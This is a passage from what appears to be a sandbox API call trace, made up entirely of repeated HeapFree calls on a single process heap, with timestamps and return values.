0x4e0848 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a4708 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49e0e0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4934e8 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4934c8 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4add20 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x484028 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x493528 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4a4730 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49e0f8 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49e110 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x49e0b0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.835] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0226.837] HeapFree (in: 